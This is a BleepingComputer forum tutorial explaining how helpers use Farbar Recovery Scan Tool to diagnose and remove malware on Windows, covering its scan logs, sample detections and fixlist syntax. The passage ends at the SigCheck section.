Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Generic User Avatar

FRST Tutorial - How to use Farbar Recovery Scan Tool


  • Please log in to reply
12 replies to this topic

#1 picasso

picasso

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 04:55 PM

farbarlogo.png

Farbar Recovery Scan Tool

 

The latest version may be downloaded from:

Link 1 | Link 2

 
Farbar Recovery Scan Tool (FRST) is a diagnostic tool incorporating the ability to execute prepared script solutions on malware infected machines. It will work equally well in normal or safe mode and where a machine has boot up problems it will work efficiently in the Windows Recovery Environment. Its ability to work in the recovery environment makes it particularly useful in dealing with problems associated with machines experiencing difficulty when booting up.
 

**********************************************************

 
 
 
Tutorial Information

This tutorial was originally created by emeraldnzl in consultation with Farbar and with the kind co-operation of BC (Bleeping Computer) and G2G (Geeks to Go). emeraldnzl has since retired and now the tutorial is added to and maintained by picasso in consultation with Farbar. Permission of both picasso and Farbar is required prior to using or quoting from the tutorial at other sites. Also note this tutorial was originally authored to offer guidance to helpers offering malware removal assistance at various forums.


Translations
 
Dutch (Netherlands) | Dutch (Belgium)
French
German
Polish
Portuguese
Russian
Spanish
 

Table of Contents

1. Introduction
2. Default Scan Areas
3. Main scan (FRST.txt)

  • Processes
  • Registry
  • Scheduled Tasks
  • Internet
  • Services/Drivers
  • NetSvcs
  • One month (Created/Modified)
  • FLock
  • FCheck
  • KnownDLLs
  • SigCheck
  • Association
  • Restore Points
  • Memory info
  • Drives and MBR & Partition Table
  • LastRegBack

4. Additional scan (Addition.txt)

  • Accounts
  • Security Center
  • Installed Programs
  • Custom CLSID
  • Codecs
  • Shortcuts & WMI
  • Loaded Modules
  • Alternate Data Streams
  • Safe Mode
  • Association
  • Internet Explorer
  • Hosts content
  • Other Areas
  • MSCONFIG/TASK MANAGER disabled items
  • FirewallRules
  • Restore Points
  • Faulty Device Manager Devices
  • Event log errors
  • Memory info
  • Drives
  • MBR & Partition Table

5. Other optional scans

  • List BCD
  • SigCheckExt
  • Shortcut.txt
  • 90 Days Files
  • Search Files
  • Search Registry

6. Directives/Commands

  • CloseProcesses:
  • CMD:
  • Comment:
  • Copy:
  • CreateDummy:
  • CreateRestorePoint:
  • DeleteJunctionsInDirectory:
  • DeleteKey: and DeleteValue:
  • DeleteQuarantine:
  • DisableService:
  • EmptyEventLogs:
  • EmptyTemp:
  • ExportKey: and ExportValue:
  • File:
  • FilesInDirectory: and Folder:
  • FindFolder:
  • Hosts:
  • ListPermissions:
  • Move:
  • Powershell:
  • Reboot:
  • Reg:
  • RemoveDirectory:
  • RemoveProxy:
  • Replace:
  • RestoreFromBackup:
  • RestoreMbr:
  • RestoreQuarantine:
  • SaveMbr:
  • SetDefaultFilePermissions:
  • StartBatch: — EndBatch:
  • StartPowershell: — EndPowershell:
  • StartRegedit: — EndRegedit:
  • Symlink:
  • SystemRestore:
  • TasksDetails:
  • testsigning on:
  • Unlock:
  • Virusscan:
  • Zip:

7. Canned Speeches

 

Trusted helpers and experts who have the requisite access may keep abreast of the latest tool developments at the FRST Discussion Thread.


Edited by picasso, 13 March 2024 - 08:47 AM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

BC AdBot (Login to Remove)

 


#2 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:02 PM

Introduction




One of FRST's strengths is its simplicity. It is designed to be user friendly. Lines containing references to infected items can be identified, copied from the log, pasted into Notepad and saved. Then with a press of a button the tool does the rest. This allows for great flexibility, as new infections appear they can be identified and included in a fix.
 
 
What it will work with

Farbar's Recovery Scan Tool is designed to run on Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10 and Windows 11 Operating Systems. There are two versions, a 32-bit and a 64-bit version.
 
Note: FRST64 is not designed to run on XP 64-bit systems.
 
 
Diagnosis

FRST creates a log covering specific areas of the Windows Operating System. This can be used for initial problem analysis and to tell you some information about the system.

The tool is under constant development, part of which includes the addition of new malware identification labels. Accordingly, it is strongly recommended to regularly update. If the computer is connected to the internet there will be an automatic check for available updates when FRST is opened. A notification will appear and the latest version can then be downloaded.  

Where new infection manifests or update is not possible e.g. no internet connection for whatever reason, the expert needs to be abreast of latest developments in the malware infection field to enable early pinpointing of the problem. The lay user should seek expert help when new infections appear or when they find difficulty in identifying the problem on their machine.

By default, like many other scanners, FRST applies whitelisting. This avoids very long logs. If you do want to see a full log; then the relevant box on the Whitelist section should be unchecked. Be prepared for a very long log that may have to be uploaded as an attachment for analysis.

  • Default Microsoft entries are whitelisted.
  • In the case of Services and Drivers the whitelist covers not only the default MS services but also other legitimate services and drivers.
  • Signed Microsoft executables are whitelisted on the "One month (created)" list.
  • Entries with not signed files are not whitelisted.
  • No security program (AV or Firewall) is whitelisted.
  • The SPTD service is not whitelisted.

.
Preparation for use

Make sure FRST is run under administrator privileges. Only when the tool is run by a user that has administrator privileges will it work properly. If a user doesn't have administrator privileges you will see a warning in the header of FRST.txt about it.

In some cases a security program will prevent the tool from running fully. Generally there won't be a problem but be alert to the possibility that when a scan is requested that a security program may prevent the running of the tool. When fixing it is preferred to disable programs like Comodo that might prevent the tool from doing its job.

A general recommendation to everyone is that when you are dealing with a rootkit, it is better to do one fix at the time and wait for the outcome before running another tool.

It is not necessary to create a registry backup. FRST makes a backup of the registry hives the first time it runs. The backup is located in %SystemDrive%\FRST\Hives (in most cases C:\FRST\Hives). See the RestoreFromBackup: directive for more details.

FRST is available in a number of different languages. Helpers tend to use English as their language of choice for problem analysis. Where a helper or someone seeking help wishes to provide logs in English, just run FRST by adding the word English to the name e.g. EnglishFRST.exe or EnglishFRST64.exe or FRSTEnglish.exe or FRSTEnglish64.exe. The resultant log will be in English.
 
 
Running FRST

The user is instructed to download FRST to the Desktop. From there it is a simple matter to double click the FRST icon, accept the disclaimer, and run it. The FRST icon looks like this:
 

frsticon.png

 
Note: You need to run the version compatible with the user's system. There are 32-bit and 64-bit versions. If you are not sure which version applies, have the user download both of them and try to run them. Only one of them will run on the system, that will be the right version.

When FRST is opened the user is presented with a console looking like this:
 

frstconsole.png

 
 
Once FRST has completed its scan it will save notepad copies of the scan in the same location that FRST was started from. On the first and subsequent scans outside the Recovery Environment a FRST.txt log and an Addition.txt log will be produced.

Copies of logs are saved at %SystemDrive%\FRST\Logs (in most cases this will be C:\FRST\Logs).
 
 
 
Fixing
 
Care, Very Important: Farbar Recovery Scan Tool is non invasive and in scan mode it cannot harm a machine.

However FRST is also very effective at carrying out instructions given to it. When applying a fix; if it is asked to remove an item; in 99% of cases it will do so. While there are some safeguards built in they are necessarily broad based and designed not to interfere with removal of infection. The user needs to be aware of that. Used incorrectly (that is if requested to remove essential files), the tool can render a computer unbootable.
 

If you are unsure about any items in a FRST report always seek expert help before administering a fix.

 
 
FRST has a range of commands and switches that can be used both to manipulate the computer's processes and to fix problems you have identified.
 
 
 
 
Preparing Fixlist

1. Fixlist.txt method - To fix identified problems, copy and paste the lines from the FRST logs to a text file named fixlist.txt and saved in the same directory the tool is run from.

Note: It is important that Notepad is used. The fix will not work if Word or some other program is used.
 
2. Ctrl+y method - The keyboard shortcut can be used to automatically create and open an empty file to be filled. Launch FRST, press Ctrl+y to open the file, paste the fix, press Ctrl+s to save.
 
3. Clipboard method - Insert lines to be fixed between Start:: and End:: like so:

Start::
script content
End::

Let the user copy the whole content including Start:: and End:: and click Fix button.
 
 
 
Unicode

To fix an entry with Unicode characters in it, the script should be saved in Unicode otherwise the Unicode characters will be lost. Ctrl+y shortcut saves the text file in Unicode. But in case of fixlist.txt created manually a proper encoding has to be chosen in Notepad (see below).

Example:
 

S2 楗敳潂瑯獁楳瑳湡t; 㩃停潲牧浡䘠汩獥⠠㡸⤶坜獩履楗敳䌠牡⁥㘳尵潂瑯楔敭攮數 [X]
ShortcutWithArgument: C:\Users\Public\Desktop\Gооglе Сhrоmе.lnk -> C:\Users\User\AppData\Roaming\HPRewriter2\RewRun3.exe (QIIXU APZEDEEMFA) -> 1 0 <===== Cyrillic
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Google Chrome.lnk.bat

 
Copy and paste the entries into the open Notepad, select Save As..., under Encoding: select UTF-8, give it fixlist name and save it.

If you save it without selecting UTF-8, Notepad will give you a warning. If you go on and save it, after closing it and opening it again you will get:
 

S2 ????????t; ??????????????????????????? [X]
C:\Users\Public\Desktop\G??gl? ?hr?m?.lnk
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Google Chrome.lnk.bat

 
And FRST will not be able to process the entries.
 
 
 
Manipulated user names

Some users alter logs by removing or replacing a user name. To make sure that correct paths are processed you can replace the potentially manipulated user name in paths with CurrentUserName (for logged in user) or AllUserName (for all users). FRST will automatically translate the keywords to a correct user name.
 
Note: CurrentUserName is not supported in the Recovery Environment.
 
 
 
To prevent FRST from hanging for hours due to incorrect scripts, the cmd: and Powershell: directives execution time is limited to 60 minutes.
 
Items moved by the fix are kept in %SystemDrive%\FRST\Quarantine, in most cases this will be C:\FRST\Quarantine until clean up and deletion of FRST.

For detailed information about preparing fixes see sections below.
 
 
 
Removing FRST
 
To remove automatically all files/folders created by FRST and the tool itself rename FRST/FRST64.exe to uninstall.exe and run it. The procedure requires a reboot and works only outside of the Recovery Environment.


Edited by picasso, 03 September 2023 - 02:16 PM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#3 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:08 PM

Default Scan Areas


 
On the first and subsequent scans outside the Recovery Environment a FRST.txt log and an Addition.txt log are generated. An Addition.txt log is not produced when FRST is run in the Recovery Environment.


Scans run in normal mode:

Main scan

Processes [digital signatures check]
Registry [digital signatures check]
Scheduled Tasks [digital signatures check]
Internet [digital signatures check]
Services [digital signatures check]
Drivers [digital signatures check]
NetSvcs
One month (Created) [Microsoft digital signatures check]
One month (Modified)
Files in the root of some directories
FLock
FCheck
SigCheck [digital signatures check]
LastRegBack

Additional scan

Accounts
Security Center
Installed Programs
Custom CLSID [digital signatures check]
Codecs [digital signatures check]
Shortcuts & WMI
Loaded Modules [digital signatures check]
Alternate Data Streams
Safe Mode
Association
Internet Explorer [digital signatures check]
Hosts content
Other Areas
MSCONFIG/TASK MANAGER disabled items
FirewallRules [digital signatures check]
Restore Points
Faulty Device Manager Devices
Event log errors
Memory info
Drives
MBR & Partition Table

Optional scans

List BCD
SigCheckExt [digital signatures check]
Shortcut.txt
Addition.txt
90 Days Files
 
Search Files [digital signatures check]
Search Registry
 
Note: [File not signed] will be printed for files without a digital signature or files with not verified signature.


Scans run in the Recovery Environment:

Main scan

Registry
Scheduled Tasks
Services
Drivers
NetSvcs
One month (Created)
One month (Modified)
KnownDLLs
SigCheck
Association
Restore Points
Memory info
Drives
MBR & Partition Table
LastRegBack
 
Optional scans

List BCD
90 Days Files
 
Search Files
 
Note: The digital signatures check is not available in the Recovery Environment.
Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#4 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:15 PM

Main scan (FRST.txt)

 
Header

Here is an example header:
 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-08-2023
Ran by User (administrator) on DESKTOP-3DJ40NK (Dell Inc. Inspiron 7352) (03-09-2023 22:20:17)
Running from C:\Users\User\Desktop\FRST64.exe
Loaded Profiles: User
Platform: Windows 10 Pro Version 22H2 19045.3324 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal

 
Perusal of the header can be very helpful:

First line: tells whether FRST 32-bit or 64-bit variant has been run. The version identifier of FRST is also shown. The version identifier is particularly important. An old version may not have the most up to date functionality.
 
Second line: shows what user ran the tool and under what permissions. This can alert you to whether the user has the appropriate permission rights. The line also shows you the computer name together with System Manufacturer and Model (if available). The date and time the tool was run is helpful to recognize an old log inadvertently supplied by a user.

Third line: tells you where FRST was run from. This may be relevant for fix instruction if it has run from somewhere other than the Desktop.

Fourth line: tells you what account (profile) the user is logged in under i.e. the loaded user hives (ntuser.dat and UsrClass.dat).

Note: In case of more than one loaded account (using "Switch user" or "Log off" to swap accounts) FRST will list all the accounts under "Loaded Profiles" and their registry entries. Other not loaded accounts won't be listed under "Loaded Profiles" but FRST will automatically mount matching hives (only ntuser.dat) for the Registry scan.

Fifth line: records the edition of Windows on the machine including major updates (Version and OS build on Windows 11 and Windows 10, "Update" on Windows 8.1, Service Pack on Windows 7 and older) together with the language used. This may alert you to a problem with updates if the updates are not the latest.

Sixth line: gives you the default browser.

Seventh line: tells you what mode the scan was run under.

Following that there is a line showing the tutorial link.

Note: The information in a header run in the Recovery Environment is similar although it is necessarily truncated as user profiles are not loaded.
 
 
 
 
Alerts that can show in the header:

When there are boot problems you may see something like "ATTENTION: Could not load system hive". That tells you that system hive is missing. Restoring the hive using LastRegBack: may be a solution (see below).

"Default: Controlset001" - The notification tells you which CS on the system is default CS. Why do you need it? Normally you don't need it, but in a case where you want to look into or manipulate the CS that will be loaded when Windows booted, then you know which CS should be looked into or manipulated. Doing anything to other available CS has no effect on the system.
 
 
 
 
Processes
 

(cmd.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <8>

 
In case a process is run by another process, (parent process ->) will be listed.
 
<number> attached at the end of line indicates multiple instances of the same process.
 
There are two reasons why you might want to stop a process. First, you may want to stop a legitimate process that might get in the way of a fix. Secondly, you may want to stop a bad process and then remove the folder or file associated with it.

To stop a process include the appropriate lines from the FRST scan. A Fixlog.txt will be generated with this label Process name => Process closed successfully

If you have a bad process and wish to remove the associated file or folder you need to include the item separately in your fix.

 
Registry

Registry entries (keys or values) that are taken from FRST log and included in the fixlist to be deleted, will be deleted. FRST has a powerful deletion routine for keys and values. All the keys and values that resist deletion due to insufficient permissions or null embedded characters will be deleted. The keys that resist deletion due to access denied will be scheduled for deletion after reboot. The only keys that will not be deleted are those keys that are still protected by a kernel driver. Those keys/values should be deleted after the kernel driver that is protecting them is removed or disabled.

Copy and pasting the items from a log into a fix triggers FRST to perform one of the two actions on the listed registry key/value:

  • Restoring the default key/value or
  • deleting the key/value.

When the entries from the log related to BootExecute, Winlogon values (Userinit, Shell, System), LSA, and AppInit_DLLs are copied to the fixlist the tool restores the default Windows values.

Note: With AppInit_DLLs where there is one bad path, FRST removes that particular path from the Applnit_DLLs value without removing the rest.

No need for any batch or regfix. The same applies to some other important keys/values that might be hijacked by the malware.

Note: FRST does not touch the files the registry keys are loading or executing. Files to be moved must be listed separately with the full path without any additional information.

The Run, RunOnce, Image File Execution Options and other registry entries if copied to the fixlist will be removed from the registry. The files they are loading or executing will not be removed. If you wish to remove them you must list them separately.

For example, to remove the bad run entry along with the file you would list them in the fixlist as follows (the first line being copied directly from the log):
 

HKLM\...\RunOnce: [LT1] => C:\WINDOWS\TEMP\gA652.tmp.exe [216064 2019-04-13] () [File not signed] <==== ATTENTION
C:\WINDOWS\TEMP\gA652.tmp.exe

 

 

When a file or shortcut in the Startup folder is detected, FRST lists the file on the Startup: entries. If the file is a shortcut the next line will list the shortcut target ( i.e. the executable that is run by the shortcut). To remove both the shortcut and the target file you need to include both of them.

Example:
 

Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2019-03-25]
ShortcutTarget: helper.lnk -> C:\Users\User\AppData\Roaming\WindowsServices\helper.vbs () [File not signed]


Note: The first line only moves the shortcut. Listing the second line moves the helper.vbs file. If you only list the second line, the executable file will be removed but the shortcut will remain in Startup folder. The next time the system is started it will throw an error when the shortcut tries to run the executable and doesn't find it.
 

FRST detects redirected Startup folders (per-user and per-system).

Example:
 

StartupDir: C:\Users\User\AppData\Local\Temp\b64c58644b\  <==== ATTENTION

 

To fix include the entry in the fixlist and FRST will restore the default path.

 

 

In case of a malware that abuses Untrusted Certificates or Software Restriction Policies, you will see entries like this:


HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION

 

HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION

 
To unblock security programs include the lines in the fixlist.
 
Note: The Software Restriction Policies detection is generic and may result in flagging other legit entries created to protect from infections. See: How to manually create Software Restriction Policies to block ransomware.
 

 

FRST detects also a presence of Group Policy Objects (Registry.pol and Scripts), which can be misused by malware. Firefox, Google Chrome, Edge and Windows Defender policies in the Registry.pol will be reported individually:
 

GroupPolicy: Restriction - Windows Defender <======= ATTENTION

 
For other policies or scripts, you will get only a generic notification without details:
 

GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicyScripts: Restriction <======= ATTENTION

 
To reset the policies include the lines in the fixlist. FRST will prune GroupPolicy folders and force a reboot.
 
Example:
 

C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully

 
Note: The detection is adjusted for a standard home computer with no policies configured and may result in flagging legit entries introduced manually via gpedit.msc.
 
 
Scheduled Tasks

When an entry is included in a fixlist the task itself is fixed.

Example:
 

Task: {A0DC62F9-8007-4B9C-AAA2-0AB779246E27} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4925952 2019-03-19] () [File not signed] <==== ATTENTION

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => removed successfully
C:\Windows\System32\Tasks\csrss => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully

 
Please note that FRST only removes the registry entries and moves the task file but does not move the executable. If the executable is bad it should be added in separate line to the fixlist to be moved.
 
Note: Malware can use a legitimate executable (e.g. using sc.exe to run its own services) to run its own file. In other words you need to check the executable to ascertain if it is legitimate or not before taking action.
 
The following line should not be included in the fixlist:
 

"{Random GUID}" => key was unlocked. <==== ATTENTION

 
The message indicates that FRST detected broken permissions and automatically fixed them during a scan. New FRST log should be taken to check if the unlocked task is visible (custom task) or not (whitelisted Microsoft entry). If necessary, include the standard task line in the fixlist.


Edited by picasso, 13 December 2023 - 01:50 AM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#5 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:20 PM


Internet

Apart from a few exceptions, items copied to fixlist will be removed. For registry entries that involve files/folders, the files/folders should be listed separately to be moved. This does not apply to browsers entries, see the descriptions below for more details.


Winsock

If a Catalog5 entry is listed to be fixed, FRST will do one of two things:

1. In the case of hijacked default entries, it will restore the default entry.
2. In case of custom entries, it will remove it and re-number the catalog entries.

Where there are Catalog9 entries to be fixed, it is recommended to use "netsh winsock reset":
 
cmd: netsh winsock reset
 
Where there are still custom Catalog9 entries to be fixed, they can be listed to be fixed. In that case FRST will remove the entries and re-number the catalog entries.

Care: a broken chain will prevent a machine connecting to the Internet.

A broken internet access due to missing winsock entries will be reported on the log like this:
 

Winsock: -> Catalog5 - Broken internet access due to missing entry. <===== ATTENTION
Winsock: -> Catalog9 - Broken internet access due to missing entry. <===== ATTENTION

 
To fix the issue, the entries can be included in the fixlist.
 

hosts

When there are custom entries in Hosts, you will get a line in Internet section on FRST.txt log saying:

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt


If the hosts file is not detected, there will be an entry about not being able to detect hosts.

To reset the hosts just copy and paste the line into the fixlist and the hosts will be reset. You will see a line in Fixlog.txt confirming the reset.


Tcpip and other entries

The entries when included in the fixlist will be deleted.
 
Note: DNS servers configured in registry (DhcpNameServer and NameServer) can be compared with the "DNS servers" scan in Addition.txt to detect which setup is active.
 
 
 

Note: In the case of StartMenuInternet hijacking the default entries will be whitelisted. When the entry appears in a FRST log it means that a non-default path is shown. There may or may not be something wrong with the access path in the registry and further investigation should be made. Where there is a problem the entry can be included in the fixlist and the default registry entry will be restored.
 
Note: Extensions not installed via the official repositories (Chrome Web Store, Firefox Add-ons, Microsoft Edge Addons, Opera add-ons) will have an update url detected.
 
 
 
Edge
 
On Windows 10, both versions of the browser are detected and listed together in the log.
 
Classic Edge: Except DownloadDir, lines can be entered in the fixlist and the items will be deleted.
 
Chromium-based Edge: The same rules apply as for Google Chrome. See the description below.


Firefox

FRST lists FF keys and profiles (if present) regardless of whether FF is installed or not. Where there are multiple Firefox or Firefox clones profiles FRST will list preferences and extensions in all profiles. Non-standard profiles inserted by adware are flagged.

Except FF DefaultProfile and FF DownloadDir, lines can be entered in the fixlist and the items will be deleted.
 
FRST verifies Add-ons digital signatures. Unsigned Add-ons are labelled.

Example:
 

FF Extension: (Adblocker for Youtube™) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-01-18] [not signed]

 
 
Chrome

FRST lists Chrome keys and profiles (if present) regardless of whether Chrome is installed or not. Where there are multiple profiles FRST will list preferences and extensions in all profiles. Non-standard profiles inserted by adware are flagged.
 
The preferences scan includes modified HomePage and StartupUrls, enabled Session Restore, some parameters of a custom default search provider and allowed notifications:
 

CHR HomePage: Default -> hxxp://www.web-pl.com/
CHR StartupUrls: Default -> "hxxp://www.web-pl.com/"
CHR DefaultSearchURL: Default -> hxxp://www.web-pl.com/search?q={searchTerms}
CHR Session Restore: Default -> is enabled.
CHR Notifications: Default -> hxxps://www.speedtestace.co

 
The HomePage, StartupUrls and Notifications entries when included in the fixlist will be deleted. Processing other entries will result in a partial Chrome reset and a user may see the following message on Chrome settings page: "Chrome detected that some of your settings were corrupted by another program and reset them to their original defaults".
 
FRST detects also New Tab redirections controlled by extensions. To remove the redirect identify a matching extension (if present) and properly uninstall it via Chrome tools (see below).
 

CHR NewTab: Default ->  Active:"chrome-extension://algadicmefalojnlclaalabdcjnnmclc/stubby.html"
CHR Extension: (RadioRage) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\algadicmefalojnlclaalabdcjnnmclc [2017-04-07]

 
Removing extensions is not supported. CHR Extension lines are not processed in a fix, use Chrome's own tools instead:
 

Type chrome://extensions in the address bar and press Enter.
Click Remove under the extension you'd like to completely remove.
A confirmation dialog appears, click Remove.


An exception is an extension installer located in the registry (CHR HKLM and HKU labels). When the entry is included in the fixlist, the key will be deleted.


Other Chromium-based browsers
 
Currently the following browsers are supported: Brave, Opera, Vivaldi, Yandex Browser.
 
The same rules apply as for Google Chrome. See the description above.
 
 
For browsers that are not shown in the log then the best option is a complete uninstall followed by a reboot and reinstall.
Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#6 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:23 PM

Services and Drivers

The Services and Drivers are formatted as follows:

RunningState StartType ServiceName; ImagePath or ServiceDll [Size CreationDate] (SignerName -> CompanyName) [signature verification]

RunningState - the letter beside the number represents the Running State:

R=Running
S=Stopped
U=Undetermined

The "StartType" numbers are:

0=Boot
1=System
2=Auto
3=Demand
4=Disabled
5=Assigned by FRST when it is unable to read the start type

Where you see [X] at the end of a listed entry that indicates that FRST could not find the files associated with the particular Service or Driver and has listed the ImagePath or ServiceDll as it is in the registry instead.

Default Microsoft services pointing to not signed files will require repairing.

Example:
 

==================== Services (Whitelisted) =================

R2 DcomLaunch; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [512512 2010-11-20] (Microsoft Corporation) [File not signed]


In this case the file needs to be replaced with a good copy. To fix, use the Replace: command.

To remove a bad service or driver, copy the line from the scan log to fixlist. Any associated file should be included separately.

Example:
 

R1 94BE3917F6DF; C:\Windows\94BE3917F6DF.sys [619880 2019-03-07] (韵羽健康管理咨询(上海)有限公司 -> VxDriver)  <==== ATTENTION
C:\Windows\94BE3917F6DF.sys


The tool closes any service entry that is included in the fixlist and removes the service key.
 
Note: FRST will report success or failure of stopping services that are running. Regardless of if the service is stopped or not, FRST attempts to delete the service. Where a running service is deleted FRST will inform the user about completing the fix and the need to restart. Then FRST will restart the system. You will see a line at the end of Fixlog about the needed restart. If a service is not running, FRST will delete it without forcing a restart.

There is one exception where a service will be repaired instead of being deleted. In case of hijacked Themes you will see:
 

S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Windows -> Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION

 
The entry when included in the fixlist will be restored to the default state.

The following line should not be included in the fixlist:
 

"ServiceName" => service was unlocked. <==== ATTENTION


The message indicates that FRST detected broken permissions and automatically fixed them during a scan. New FRST log should be taken to verify the result. If necessary, include the standard service line in the fixlist.


NetSvcs

The NetSvc entries are listed each on a line, like this:
 

NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
NETSVCx32: WpSvc ->  no filepath

 
Note: Listing Netsvc only removes the associated value from the registry. The associated service (if present under the Services section) should be listed for deletion separately.

Example:
 
To remove the Netsvc value, the associated service in the registry and the associated DLL file, the full script would look like this:
 

S2 HpSvc; C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll [239016 2016-07-21] (Qihoo 360 Software (Beijing) Company Limited -> ) <==== ATTENTION
NETSVCx32: HpSvc -> C:\Program Files (x86)\LuDaShi\lpi\HpSvc.dll ()
C:\Program Files (x86)\LuDaShi


Edited by picasso, 29 January 2023 - 06:05 PM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#7 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:28 PM

One month (Created/Modified)

The "Created" scan reports the file or folder's created date and time followed by the last modified date and time. The "Modified" scan reports the file or folder's modified date and time followed by the date and time it was created. The size of (number of bytes contained) the file is also shown. A folder will show 00000000 as the folder itself has no bytes.
 
Note: To avoid a very long scan time and the production of excessively large logs, the scan is limited to some predefined locations. Also, FRST only lists custom folders, but not their contents. If you wish to know the contents of a custom folder use the Folder: directive.
 
Note: Digital signatures check is limited to Microsoft executables (whitelisted by default). Other digital signatures are not checked. To get an additional list of unsigned executables use the SigCheckExt optional scan.
 
FRST adds notations to certain log entries:

C - Compressed
D - Directory
H - Hidden
L - Symbolic Link
N - Normal (does not have other attributes set)
O - Offline
R - Readonly
S - System
T - Temporary
X - No scrub (Windows 8+)

To remove a file or folder in the one month list just copy and paste the whole line to fixlist.
 
Lines pointing to symbolic links (the L attribute) are handled correctly.
 
Example:

2018-02-21 21:04 - 2018-02-21 21:04 - 000000000 ___DL C:\WINDOWS\system32\Link
 
When included in the fixlist, FRST will delete only the link, leaving the target untact:
 

Symbolic link found: "C:\WINDOWS\system32\Link" => "C:\Windows\System32\Target"
"C:\WINDOWS\system32\Link" => Symbolic link removed successfully
C:\WINDOWS\system32\Link => moved successfully

 
Alternatively, the DeleteJunctionsInDirectory: directive could be used.
 
To fix other files/folders the path could be listed in the fixlist, no quote marks needed for the path with space:
 
C:\Windows\System32\Drivers\bad.sys
C:\Program Files (x86)\Bad
 
If you have more files with similar file name and wanted to move them with one script the wildcard * can be used.

So you can either list those files like:

C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At52.job
Or just:
C:\Windows\Tasks\At*.job
 
Note: A question mark "?" character is ignored for safety reasons, no matter whether it is a wildcard or a substitution for Unicode characters (see the "Unicode" description under Introduction). Also, wildcards are not supported for folders.
 
 
FLock

The section lists locked files and folders in standard directories.
 
 
FCheck

The section is designed to list bad files if detected, for example DLL Hijacking. Also, some zero byte files (.exe and .dll files) in standard directories are listed. The section only appears when matching items are present.

When an entry is included in the fixlist, a file/folder will be moved.


KnownDLLs

Some items in this section if missing or patched or corrupted could cause boot issues. Accordingly this scan only appears when the tool is run in RE (Recovery Environment) mode.

Items are whitelisted unless they need attention.

Care is required in dealing with items identified in this section. Either a file is missing or it appears to have been modified in some way. Expert help is recommended to ensure the problematic file is correctly identified and dealt with in the appropriate way. In the majority of cases there is a good replacement on the system that should be found with the Search function of FRST. Please see the Directives section for how to replace a file and Other optional scans section for how carry out a search.


SigCheck

